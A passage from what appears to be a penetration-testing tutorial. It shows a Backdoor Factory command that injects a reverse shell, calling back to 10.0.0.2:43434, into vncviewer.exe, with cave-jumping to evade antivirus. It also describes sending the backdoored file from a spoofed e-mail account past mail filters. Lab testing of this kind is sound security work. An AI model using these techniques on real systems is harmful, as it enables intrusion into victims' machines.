The exploit code worked well on an XP SP2 machine with no Anti-virus software, and would work well on any machine that didn't have Anti-virus installed, but it was less effective on a Windows 10 machine with the basic default Windows Anti-virus installed. We had to turn off the real-time checking feature on the Anti-virus to get the e-mail to read without errors, and the Anti-virus scrubbed out our doctored file. As security engineers, we are happy that Microsoft Windows 10 has such an effective anti-malware feature, right out of the gate. As penetration testers, we are disappointed.
The Backdoor Factory inserts shell-code into working EXE files without otherwise changing the original all that much. You can use the executables in the following /usr/share/windows-binaries directory, or any other Windows binary that does not have protection coded into it:
The code to run Backdoor Factory and create a remote shell with a listener at 10.0.0.2 on port 43434 is as follows. The cave-jumping option spreads your code across the voids in the executable to further confuse the Antivirus scans:
backdoor-factory –cave-jumping -f /usr/share/windows-binaries/vncviewer.exe -H 10.0.0.2 -P 43434 -s reverse_shell_tcp
If you make an error in the shell-code choice (as above) the application shows you your choices:
backdoor-factory –cave-jumping -f /usr/share/windows-binaries/vncviewer.exe -H 10.0.0.2 -P 43434 -s reverse_shell_tcp_inline
The Backdoor Factory then carries on and gives options for injecting the shell-code into all the voids or caves in the binary:
We will just choose Cave 1:
The backdoored directory is in the root home directory ~/backdoored/; thus, it is easy to find. We could use Social Engineering Toolkit to push this doctored file to a mass mailing, but you can just e-mail it from a spoofed account to the Windows 10 box to see if it can clear the Anti-virus hurdle. The executable had to be zipped to get past the filters on our mailserver, and as soon as it was unzipped on the Windows 10 machine, it was scrubbed away as a malware file.
Windows 10 default Anti-virus found this file as it found the other file, from the Social Engineering Toolkit. Unpatched, older versions of Windows are plainly at risk.